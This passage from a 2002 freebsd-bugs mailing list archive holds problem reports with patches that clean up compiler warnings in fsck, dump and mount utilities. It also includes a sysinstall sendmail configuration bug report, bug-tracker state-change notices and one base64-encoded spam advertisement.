unsigned int it is never used with signed context, so it can be declared as unsigned int sbin/fsck/inode.c: In function `chkrange': 250: warning: long int format, ufs_daddr_t arg (arg 2) 250: warning: long int format, int arg (arg 3) 250: warning: long int format, int arg (arg 4) fragnum() and cnt is int blk is ufs_daddr_t e.g. int32_t e.g. int sbin/fsck/main.c: 376: warning: implicit declaration of function `strerror' 411: warning: implicit declaration of function `strcat' we should include strings.h sbin/fsck/pass2.c: In function `pass2': 140: warning: int format, long int arg (arg 4) 140: warning: int format, long int arg (arg 5) inplast is declared as long sbin/fsck/pass3.c: In function `pass3': 65: warning: int format, long int arg (arg 3) 65: warning: int format, long int arg (arg 4) 65: warning: int format, long int arg (arg 5) inplast is declared as long sbin/fsck/pass5.c: In function `pass5': 95: warning: comparison between signed and unsigned fs_bsize is int32_t CGINFO() is sizeof(...) 235: warning: comparison between signed and unsigned 242: warning: comparison between signed and unsigned i,j are long; ROOTINO is ino_t e.g. u_int32_t sbin/fsck/preen.c: In function `blockcheck': 296: warning: unused variable `raw' 295: warning: unused variable `stchar' 295: warning: unused variable `stslash' those variables are really unused >How-To-Repeat: N/A >Fix: --- src/sbin/fsck/dir.c.ORIG Sat Aug 28 02:12:45 1999 +++ src/sbin/fsck/dir.c Wed Jun 26 02:06:23 2002 @@ -107,7 +107,8 @@ { register struct direct *dp; register struct bufarea *bp; - int dsize, n; + unsigned int dsize; + int n; long blksiz; char dbuf[DIRBLKSIZ]; --- src/sbin/fsck/inode.c.ORIG Mon Feb 28 21:02:41 2000 +++ src/sbin/fsck/inode.c Wed Jun 26 02:12:07 2002 @@ -246,7 +246,7 @@ if (cnt > sblock.fs_frag || fragnum(&sblock, blk) + cnt > sblock.fs_frag) { if (debug) - printf("bad size: blk %ld, offset %ld, size %ld\n", + printf("bad size: blk %d, offset %d, size %d\n", blk, fragnum(&sblock, blk), cnt); return (1); } --- src/sbin/fsck/main.c.ORIG Wed Jan 24 03:18:00 2001 +++ src/sbin/fsck/main.c Wed Jun 26 02:18:04 2002 @@ -59,6 +59,7 @@ #include #include #include +#include #include "fsck.h" --- src/sbin/fsck/pass2.c.ORIG Sun Nov 25 17:33:56 2001 +++ src/sbin/fsck/pass2.c Wed Jun 26 02:23:21 2002 @@ -135,7 +135,7 @@ inpend = &inpsort[inplast]; for (inpp = inpsort; inpp < inpend; inpp++) { if (got_siginfo) { - printf("%s: phase 2: dir %d of %d (%d%%)\n", cdevname, + printf("%s: phase 2: dir %d of %ld (%ld%%)\n", cdevname, inpp - inpsort, inplast, (inpp - inpsort) * 100 / inplast); got_siginfo = 0; --- src/sbin/fsck/pass3.c.ORIG Wed Jan 24 03:18:00 2001 +++ src/sbin/fsck/pass3.c Wed Jun 26 02:26:38 2002 @@ -60,7 +60,7 @@ for (inpindex = inplast - 1; inpindex >= 0; inpindex--) { if (got_siginfo) { - printf("%s: phase 3: dir %d of %d (%d%%)\n", cdevname, + printf("%s: phase 3: dir %ld of %ld (%ld%%)\n", cdevname, inplast - inpindex - 1, inplast, (inplast - inpindex - 1) * 100 / inplast); got_siginfo = 0; --- src/sbin/fsck/pass5.c.ORIG Wed Jan 24 03:18:00 2001 +++ src/sbin/fsck/pass5.c Wed Jun 26 02:38:08 2002 @@ -92,7 +92,7 @@ i = fs->fs_contigsumsize; fs->fs_contigsumsize = MIN(fs->fs_maxcontig, FS_MAXCONTIG); - if (CGSIZE(fs) > fs->fs_bsize) { + if ((int32_t)CGSIZE(fs) > fs->fs_bsize) { pwarn("CANNOT %s CLUSTER MAPS\n", doit); fs->fs_contigsumsize = i; } else if (preen || @@ -232,14 +232,14 @@ break; default: - if (j < ROOTINO) + if ((ino_t)j < ROOTINO) break; errx(EEXIT, "BAD STATE %d FOR INODE I=%ld", inoinfo(j)->ino_state, j); } } if (c == 0) - for (i = 0; i < ROOTINO; i++) { + for (i = 0; (ino_t)i < ROOTINO; i++) { setbit(cg_inosused(newcg), i); newcg->cg_cs.cs_nifree--; } --- src/sbin/fsck/preen.c.ORIG Thu Dec 30 17:32:40 1999 +++ src/sbin/fsck/preen.c Wed Jun 26 02:40:28 2002 @@ -292,8 +292,8 @@ blockcheck(origname) char *origname; { - struct stat stslash, stblock, stchar; - char *newname, *raw; + struct stat stblock; + char *newname; struct fstab *fsinfo; int retried = 0, len; >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Jun 25 18:30:54 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 5F62B37B409 for ; Tue, 25 Jun 2002 18:30:02 -0700 (PDT) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5Q1U2c43785; Tue, 25 Jun 2002 18:30:02 -0700 (PDT) (envelope-from gnats) Received: from xkulesh.vol.cz (xkulesh.vol.cz [195.250.154.106]) by hub.freebsd.org (Postfix) with ESMTP id B7AE337B406 for ; Tue, 25 Jun 2002 18:20:33 -0700 (PDT) Received: from obluda.cz (localhost [127.0.0.1]) by xkulesh.vol.cz (8.12.3/8.12.3) with ESMTP id g5Q1KUU1057822 for ; Wed, 26 Jun 2002 03:20:31 +0200 (CEST) (envelope-from dan@obluda.cz) Received: (from root@localhost) by obluda.cz (8.12.4/8.12.4/Submit) id g5PN5fOC055526; Wed, 26 Jun 2002 01:05:41 +0200 (CEST) Message-Id: <200206252305.g5PN5fOC055526@obluda.cz> Date: Wed, 26 Jun 2002 01:05:41 +0200 (CEST) From: Dan Lukes Reply-To: Dan Lukes To: FreeBSD-gnats-submit@FreeBSD.org X-Send-Pr-Version: 3.113 Subject: bin/39868: cleaning sbin/dump code from warnings Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 39868 >Category: bin >Synopsis: cleaning sbin/dump code from warnings >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Tue Jun 25 18:30:01 PDT 2002 >Closed-Date: >Last-Modified: >Originator: Dan Lukes >Release: FreeBSD 4.6-STABLE i386 >Organization: Obludarium >Environment: System: FreeBSD xkulesh.vol.cz 4.6-STABLE FreeBSD src/sbin/dump/main.c,v 1.20.2.7 2002/02/23 22:32:51 src/sbin/dump/tape.c,v 1.12.2.3 2002/02/23 22:32:51 src/sbin/dump/traverse.c,v 1.10.2.4 2001/07/14 13:51:37 >Description: sbin/dump/main.c: In function `main': 343: warning: int format, long int arg (arg 2) dev_bsize is declared as long 476: warning: long int format, daddr_t arg (arg 2) spcl.c_tapea is ddaddr_t e.g. int32_t e.g. int 480: warning: long int format, daddr_t arg (arg 2) spcl.c_tapea is ddaddr_t e.g. int32_t e.g. int 488: warning: int format, time_t arg (arg 2) 488: warning: int format, long int arg (arg 3) time_t is long sbin/dump/tape.c: In function `tperror': 224: warning: int format, long int arg (arg 2) blocksthisvol is declared as long sbin/dump/traverse.c: In function `bread': 629: warning: int format, pointer arg (arg 3) disk is (char *) 648: warning: int format, long int arg (arg 5) dev_bsize is declared as long 652: warning: int format, long int arg (arg 4) dev_bsize is declared as long >How-To-Repeat: N/A >Fix: --- sbin/dump/main.c.ORIG Wed Jun 26 00:08:31 2002 +++ sbin/dump/main.c Wed Jun 26 00:19:29 2002 @@ -340,7 +340,7 @@ dev_bsize = sblock->fs_fsize / fsbtodb(sblock, 1); dev_bshift = ffs(dev_bsize) - 1; if (dev_bsize != (1 << dev_bshift)) - quit("dev_bsize (%d) is not a power of 2", dev_bsize); + quit("dev_bsize (%ld) is not a power of 2", dev_bsize); tp_bshift = ffs(TP_BSIZE) - 1; if (TP_BSIZE != (1 << tp_bshift)) quit("TP_BSIZE (%d) is not a power of 2", TP_BSIZE); @@ -473,9 +473,9 @@ for (i = 0; i < ntrec; i++) writeheader(maxino - 1); if (pipeout) - msg("DUMP: %ld tape blocks\n", spcl.c_tapea); + msg("DUMP: %d tape blocks\n", spcl.c_tapea); else - msg("DUMP: %ld tape blocks on %d volume%s\n", + msg("DUMP: %d tape blocks on %d volume%s\n", spcl.c_tapea, spcl.c_volume, (spcl.c_volume == 1) ? "" : "s"); @@ -483,7 +483,7 @@ if (tend_writing - tstart_writing == 0) msg("finished in less than a second\n"); else - msg("finished in %d seconds, throughput %d KBytes/sec\n", + msg("finished in %ld seconds, throughput %ld KBytes/sec\n", tend_writing - tstart_writing, spcl.c_tapea / (tend_writing - tstart_writing)); --- sbin/dump/tape.c.ORIG Sat Mar 2 14:43:00 2002 +++ sbin/dump/tape.c Wed Jun 26 00:49:20 2002 @@ -221,7 +221,7 @@ quit("Cannot recover\n"); /* NOTREACHED */ } - msg("write error %d blocks into volume %d\n", blocksthisvol, tapeno); + msg("write error %ld blocks into volume %d\n", blocksthisvol, tapeno); broadcast("DUMP WRITE ERROR!\n"); if (!query("Do you want to restart?")) dumpabort(0); --- sbin/dump/traverse.c.ORIG Sun Jul 15 21:10:05 2001 +++ sbin/dump/traverse.c Wed Jun 26 01:01:11 2002 @@ -625,7 +625,7 @@ msg("short read error from %s: [block %d]: count=%d, got=%d\n", disk, blkno, size, cnt); if (++breaderrors > BREADEMAX) { - msg("More than %d block read errors from %d\n", + msg("More than %d block read errors from %s\n", BREADEMAX, disk); broadcast("DUMP IS AILING!\n"); msg("This is an unrecoverable error.\n"); @@ -644,11 +644,11 @@ ((off_t)blkno << dev_bshift))) == dev_bsize) continue; if (cnt == -1) { - msg("read error from %s: %s: [sector %d]: count=%d\n", + msg("read error from %s: %s: [sector %d]: count=%ld\n", disk, strerror(errno), blkno, dev_bsize); continue; } - msg("short read error from %s: [sector %d]: count=%d, got=%d\n", + msg("short read error from %s: [sector %d]: count=%ld, got=%d\n", disk, blkno, dev_bsize, cnt); } } >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Jun 25 18:31:11 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 0558C37B407 for ; Tue, 25 Jun 2002 18:30:01 -0700 (PDT) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5Q1U1743776; Tue, 25 Jun 2002 18:30:01 -0700 (PDT) (envelope-from gnats) Received: from xkulesh.vol.cz (xkulesh.vol.cz [195.250.154.106]) by hub.freebsd.org (Postfix) with ESMTP id 9CDB337B404 for ; Tue, 25 Jun 2002 18:20:33 -0700 (PDT) Received: from obluda.cz (localhost [127.0.0.1]) by xkulesh.vol.cz (8.12.3/8.12.3) with ESMTP id g5Q1KUTt057822 for ; Wed, 26 Jun 2002 03:20:30 +0200 (CEST) (envelope-from dan@obluda.cz) Received: (from root@localhost) by obluda.cz (8.12.4/8.12.4/Submit) id g5Q1FemO057794; Wed, 26 Jun 2002 03:15:40 +0200 (CEST) Message-Id: <200206260115.g5Q1FemO057794@obluda.cz> Date: Wed, 26 Jun 2002 03:15:40 +0200 (CEST) From: Dan Lukes Reply-To: Dan Lukes To: FreeBSD-gnats-submit@FreeBSD.org X-Send-Pr-Version: 3.113 Subject: bin/39867: cleaning sbin/mount_cd9660 and sbin/mount_ext2fs code from warnings Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 39867 >Category: bin >Synopsis: cleaning sbin/mount_cd9660 and sbin/mount_ext2fs code from warnings >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Tue Jun 25 18:30:01 PDT 2002 >Closed-Date: >Last-Modified: >Originator: Dan Lukes >Release: FreeBSD 4.6-STABLE i386 >Organization: Obludarium >Environment: System: FreeBSD xkulesh.vol.cz 4.6-STABLE FreeBSD src/sbin/mount_cd9660/mount_cd9660.c,v 1.15.2.3 2001/03/14 12:05:01 >Description: sbin/mount_cd9660/mount_cd9660.c:42: warning: `copyright' defined but not used sbin/mount_ext2fs/mount_ext2fs.c:35: warning: `copyright' defined but not used 'const' keyword resolve it >How-To-Repeat: N/A >Fix: --- sbin/dump/mount_cd9660.c.ORIG Sun Mar 18 22:40:49 2001 +++ sbin/dump/mount_cd9660.c Wed Jun 26 03:02:02 2002 @@ -39,7 +39,7 @@ */ #ifndef lint -static char copyright[] = +static const char copyright[] = "@(#) Copyright (c) 1992, 1993, 1994\n\ The Regents of the University of California. All rights reserved.\n"; #endif /* not lint */ --- mount_ext2fs.c.ORIG Sat Oct 9 13:54:09 1999 +++ mount_ext2fs.c Wed Jun 26 03:05:13 2002 @@ -32,7 +32,7 @@ */ #ifndef lint -static char copyright[] = +static const char copyright[] = "@(#) Copyright (c) 1993, 1994\n\ The Regents of the University of California. All rights reserved.\n"; #endif /* not lint */ >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Jun 25 22:32:25 2002 Delivered-To: freebsd-bugs@freebsd.org Received: from smtp1.borahome.net (smtp1.borahome.com [203.248.241.21]) by hub.freebsd.org (Postfix) with ESMTP id 8EB2E37B400 for ; Tue, 25 Jun 2002 22:32:13 -0700 (PDT) Received: from borahome ([211.53.228.104]) by smtp1.borahome.net (8.10.0/8.10.0.Beta6) with SMTP id g5Q5XO200649 for ; Wed, 26 Jun 2002 14:33:26 +0900 (KST) Message-Id: <200206260533.g5Q5XO200649@smtp1.borahome.net> From: =?ks_c_5601-1987?B?TUVEUEFQQQ==?= To: freebsd-bugs@FreeBSD.org Subject: =?ks_c_5601-1987?B?W8irurhdIERlbnRhbCB2aWRlbyAtIEVudGl0bGVkIHRvIHdhdGNoIDEgdmlkZW8gZm9yIGZyZWU=?= Date: Wed, 26 Jun 2002 14:32:01 +0900 MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_0147_01C0F32A.93A01C00" X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org This is a multi-part message in MIME format. ------=_NextPart_000_0147_01C0F32A.93A01C00 Content-Type: text/plain; charset="ks_c_5601-1987" Content-Transfer-Encoding: base64 CQkJVW50aXRsZWQgRG9jdW1lbnQJCQkJCQkJCQkJCSAJCQkJCQkJCQkJCQ0KU3BlY2lhbCBE ZW50YWwgVmlkZW8gDQoJCQkJCSAJCQkJCQkJCQkJCQkNCgkJCQkJTWVkcGFwYSBpcyBhIHdl YnNpdGUgcHJvdmlkaW5nIGRlbnRhbCBlZHVjYXRpb25hbHNlcnZpY2VzIGluY2x1ZGluZyBz ZW1pbmFycywgc3ltcG9zaWEsIGFuZCB2aWRlb3Mgb2YgZ2VuZXJhbCBkZW50YWxzdXJnZXJ5 LgkJIA0KQ2xpY2sgdGhlIHd3dy5tZWRwYXBhLmNvbSAJCQkJdG8gZ2V0IGFjY2VzcyB0byBh IGhpZ2hlciBsZXZlbCBvZiBkZW50YWwgdGVjaG5pcXVlLiANCllvdSB3aWxsIGZpbmQgdGhl IHNpdGUgdG8gYmUgd29ydGh3aGlsZS4NCgkJCQkJQmVjb21lIGEgbWVtYmVyIGFuZCB2aWV3 IG91ciBtb2JpbGUgaW1hZ2VzIGZvciBmcmVlLiANCk5ldyBtZW1iZXJzIGFyZSBhbHNvIGVu dGl0bGVkIHRvCQkJCQl3YXRjaCAxIHZpZGVvIGZvciBmcmVlLiANCg0KCQkJCQkJCSAJCQkJ CQkJV1dXLk1lZHBhcGEuY29tDQogQ29weXJpZ2h0QDIwMDEgTWVkcGFwYSBJbnRlcm5hdGlv bmFsIEluYy4NCiAJCQk= ------=_NextPart_000_0147_01C0F32A.93A01C00 Content-Type: text/html; charset="ks_c_5601-1987" Content-Transfer-Encoding: base64 DQo8aHRtbD4NCgk8aGVhZD4NCgkJPHRpdGxlPlVudGl0bGVkIERvY3VtZW50PC90aXRsZT4N Cgk8L2hlYWQ+DQoJPGJvZHk+DQoJCTx0YWJsZSBhbGlnbj1jZW50ZXIgd2lkdGg9NDUwIGJn Y29sb3I9IzMzNjY5OT48dGQgdmFsaWduPXRvcD4NCgkJCTx0YWJsZSBib3JkZXI9MiB3aWR0 aD00NTAgaGVpZ2h0PTM1MCBiZ2NvbG9yPSNGRkZGRkYgYm9yZGVyY29sb3I9IzU5NzdBNCBh bGlnbj0iY2VudGVyIj4NCgkJCQk8dHI+ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg DQoJCQkJCTx0ZCB3aWR0aD00NTAgaGVpZ2h0PTM4IGJnY29sb3I9Izc4OTdCQSBjb2xzcGFu PTQgYWxpZ249Y2VudGVyPg0KCQkJCQkJPHA+PGI+PGZvbnQgZmFjZT0iVGltZXMgTmV3IFJv bWFuIiBjb2xvcj0jRkZGRkZGIFNJWkU9Nj5TcGVjaWFsIERlbnRhbCBWaWRlbyA8L3A+PC9m b250Pg0KCQkJCQk8L3RkPiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgDQoJCQkJPC90cj4NCgkJCQk8dHI+ DQoJCQkJPHRkIGNvbHNwYW49NCB3aWR0aD0xMDAlIGFsaWduPSJjZW50ZXIiPjxicj4NCg0K DQoJCQkJCTxmb250IHN0eWxlPSJmb250LXNpemU6MTRwdDtsaW5lLWhlaWdodDoyMHB0IiBm YWNlPSJ0aW1lcyBuZXcgcm9tYW4iID4NCk1lZHBhcGEgaXMgYSB3ZWJzaXRlIHByb3ZpZGlu ZyBkZW50YWwgZWR1Y2F0aW9uYWwNCnNlcnZpY2VzIGluY2x1ZGluZyBzZW1pbmFycywgc3lt cG9zaWEsIGFuZCB2aWRlb3Mgb2YgZ2VuZXJhbCBkZW50YWwNCnN1cmdlcnkuDQoNCgkJICAg ICAgPGJyPiBDbGljayB0aGUgPGEgaHJlZj0iaHR0cDovL3d3dy5tZWRwYXBhLmNvbSI+d3d3 Lm1lZHBhcGEuY29tPC9hPg0KICAgCQkJCXRvIGdldCBhY2Nlc3MgdG8gYSBoaWdoZXIgbGV2 ZWwgb2YgZGVudGFsIHRlY2huaXF1ZS4gPGJyPllvdSB3aWxsIGZpbmQgdGhlIHNpdGUgdG8g YmUgd29ydGh3aGlsZS48YnI+DQoJCQkJCUJlY29tZSBhIG1lbWJlciBhbmQgdmlldyBvdXIg bW9iaWxlIGltYWdlcyBmb3IgZnJlZS4gPHA+TmV3IG1lbWJlcnMgYXJlIGFsc28gZW50aXRs ZWQgdG8NCgkJCQkJd2F0Y2ggMSB2aWRlbyBmb3IgZnJlZS4gPGJyPjxicj48L2ZvbnQ+DQoJ CQkJPC90ZD4NCgkJCSA8L3RyPg0KCQkJPC90YWJsZT4NCgkJCQk8Y2VudGVyPjxhIGhyZWY9 Imh0dHA6Ly93d3cubWVkcGFwYS5jb20iPjxmb250IHNpemU9IjYiIGZhY2U9IlRpbWVzIG5l dyByb21hbiIgY29sb3I9IndoaXRlIiA+PGI+V1dXLk1lZHBhcGEuY29tPC9iPjwvZm9udD48 L2E+PGJyPg0KICAgICAgICA8Zm9udCBzdHlsZT0iZm9udC1zaXplOnMxNHB0O2ZvbnQtd2Vp Z2h0OmJvbGQiIGZhY2U9IlRpbWVzIG5ldyByb21hbiIgY29sb3I9IndoaXRlIj5Db3B5cmln aHRAMjAwMSBNZWRwYXBhIEludGVybmF0aW9uYWwgSW5jLjxicj4gDQo8L2NlbnRlcj4NCgkJ PC90YWJsZT4NCg0KCTwvYm9keT4NCjwvaHRtbD4NCg== ------=_NextPart_000_0147_01C0F32A.93A01C00-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Jun 26 8:20:57 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 2635537B4C8 for ; Wed, 26 Jun 2002 08:20:03 -0700 (PDT) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g5QFK3JU086038 for ; Wed, 26 Jun 2002 08:20:03 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g5QFK3Dl086037; Wed, 26 Jun 2002 08:20:03 -0700 (PDT) Received: from www.freebsd.org (www.FreeBSD.org [216.136.204.117]) by hub.freebsd.org (Postfix) with ESMTP id 2ADA137B849 for ; Wed, 26 Jun 2002 08:09:53 -0700 (PDT) Received: from www.freebsd.org (localhost [127.0.0.1]) by www.freebsd.org (8.12.4/8.12.4) with ESMTP id g5QF9qOT033591 for ; Wed, 26 Jun 2002 08:09:52 -0700 (PDT) (envelope-from nobody@www.freebsd.org) Received: (from nobody@localhost) by www.freebsd.org (8.12.4/8.12.4/Submit) id g5QF9qQN033590; Wed, 26 Jun 2002 08:09:52 -0700 (PDT) Message-Id: <200206261509.g5QF9qQN033590@www.freebsd.org> Date: Wed, 26 Jun 2002 08:09:52 -0700 (PDT) From: Phillip Nordwall To: freebsd-gnats-submit@FreeBSD.org X-Send-Pr-Version: www-1.0 Subject: conf/39887: /stand/sysinstall doesn't set sendmail_enable correctly in rc.conf Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 39887 >Category: conf >Synopsis: /stand/sysinstall doesn't set sendmail_enable correctly in rc.conf >Confidential: no >Severity: serious >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Wed Jun 26 08:20:02 PDT 2002 >Closed-Date: >Last-Modified: >Originator: Phillip Nordwall >Release: 4.6-RELEASE >Organization: Western Washington University Computer Science >Environment: FreeBSD YYYY.wwu.edu 4.6-RELEASE FreeBSD 4.6-RELEASE #9: Tue Jun 18 11:14:28 GMT 2002 root@YYYY.wwu.edu:/usr/obj/usr/src/sys/MIN_KERNEL i386 >Description: If you try to make it so that sendmail doesn't run using /stand/sysinstall, configure, networking, Sendmail (This machine wants to run sendmail) it puts an entry into /etc/rc.conf of sendmail_enable="NO". Upon startup of the machine sendmail still runs. If you change the entry from sendmail_enable="NO" to sendmail_enable="NONE" sendmail won't start at startup. >How-To-Repeat: Use /stand/sysinstall to make sure sendmail doesn't run. Take a look in /etc/rc.conf for sendmail_enable="NO" restart the machine, and sendmail will run. >Fix: Change what /stand/sysinstall writes to /etc/rc.conf or change rc.sendmail to accept sendmail_enable="NO" >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Jun 26 9: 5:15 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 58F3237B401; Wed, 26 Jun 2002 09:05:13 -0700 (PDT) Received: from freefall.freebsd.org (matusita@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g5QG5DJU093388; Wed, 26 Jun 2002 09:05:13 -0700 (PDT) (envelope-from matusita@freefall.freebsd.org) Received: (from matusita@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g5QG5CaW093354; Wed, 26 Jun 2002 09:05:12 -0700 (PDT) Date: Wed, 26 Jun 2002 09:05:12 -0700 (PDT) From: Makoto Matsushita Message-Id: <200206261605.g5QG5CaW093354@freefall.freebsd.org> To: coldfire-freebsd@wcug.wwu.edu, matusita@FreeBSD.org, freebsd-bugs@FreeBSD.org, matusita@FreeBSD.org Subject: Re: conf/39887: /stand/sysinstall doesn't set sendmail_enable correctly in rc.conf Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: /stand/sysinstall doesn't set sendmail_enable correctly in rc.conf State-Changed-From-To: open->feedback State-Changed-By: matusita State-Changed-When: Wed Jun 26 09:04:07 PDT 2002 State-Changed-Why: It seems that originator doesn't use sysinstall as of 4.6-RELEASE. Waiting feedbacks. Responsible-Changed-From-To: freebsd-bugs->matusita Responsible-Changed-By: matusita Responsible-Changed-When: Wed Jun 26 09:04:07 PDT 2002 Responsible-Changed-Why: I'll handle this. http://www.freebsd.org/cgi/query-pr.cgi?pr=39887 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Jun 26 9:18:20 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id A8DE737B400; Wed, 26 Jun 2002 09:18:11 -0700 (PDT) Received: from freefall.freebsd.org (robert@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g5QGIBJU097140; Wed, 26 Jun 2002 09:18:11 -0700 (PDT) (envelope-from robert@freefall.freebsd.org) Received: (from robert@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g5QGIBtN097135; Wed, 26 Jun 2002 09:18:11 -0700 (PDT) Date: Wed, 26 Jun 2002 09:18:11 -0700 (PDT) From: Robert Drehmel Message-Id: <200206261618.g5QGIBtN097135@freefall.freebsd.org> To: robert@FreeBSD.org, freebsd-bugs@FreeBSD.org, robert@FreeBSD.org Subject: Re: misc/39864: hostname instead of IP in w -n output Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: hostname instead of IP in w -n output Responsible-Changed-From-To: freebsd-bugs->robert Responsible-Changed-By: robert Responsible-Changed-When: Wed Jun 26 09:17:35 PDT 2002 Responsible-Changed-Why: I will try to fix it. http://www.freebsd.org/cgi/query-pr.cgi?pr=39864 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Jun 26 10:59:51 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 8439F37B409; Wed, 26 Jun 2002 10:59:46 -0700 (PDT) Received: from freefall.freebsd.org (marcus@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g5QHxkJU015920; Wed, 26 Jun 2002 10:59:46 -0700 (PDT) (envelope-from marcus@freefall.freebsd.org) Received: (from marcus@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g5QHxkDe015916; Wed, 26 Jun 2002 10:59:46 -0700 (PDT) Date: Wed, 26 Jun 2002 10:59:46 -0700 (PDT) From: Joe Marcus Clarke Message-Id: <200206261759.g5QHxkDe015916@freefall.freebsd.org> To: marcus@FreeBSD.org, freebsd-bugs@FreeBSD.org, marcus@FreeBSD.org Subject: Re: misc/39531: Gaim default builds WITH_GNOME Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: Gaim default builds WITH_GNOME Responsible-Changed-From-To: freebsd-bugs->marcus Responsible-Changed-By: marcus Responsible-Changed-When: Wed Jun 26 10:59:31 PDT 2002 Responsible-Changed-Why: Over to maintainer. http://www.freebsd.org/cgi/query-pr.cgi?pr=39531 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Jun 26 13:22:21 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 7EA3837C566 for ; Wed, 26 Jun 2002 13:10:21 -0700 (PDT) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id 